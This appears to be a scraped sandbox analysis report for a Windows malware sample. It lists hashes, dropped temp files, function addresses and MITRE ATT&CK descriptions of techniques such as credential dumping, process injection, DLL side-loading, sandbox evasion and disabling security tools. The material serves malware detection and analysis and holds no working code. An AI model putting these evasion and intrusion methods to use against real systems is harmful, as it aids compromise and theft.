Opcode ID: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
Instruction ID: 8de9d5149be15e572fdd04aa17f7a7b24b8beb12ead648874b83316531c9eaa7
Opcode Fuzzy Hash: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
Instruction Fuzzy Hash: E8D0C936794314BAE674A774AC0FFC67E14AB66B10F0049167759AA1D0C9A0A8059A54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4sfN3Gx1vO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\al6P40S6

C:\Users\user\AppData\Local\Temp\autF2F0.tmp

C:\Users\user\AppData\Local\Temp\autF998.tmp

C:\Users\user\AppData\Local\Temp\konked

C:\Users\user\AppData\Local\Temp\nonplacental

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
4sfN3Gx1vO.exe

Function 005142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 005142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00552BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00512CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00548D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Function 0055065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0051344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00512B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00513170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01603050 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00512C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01602E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre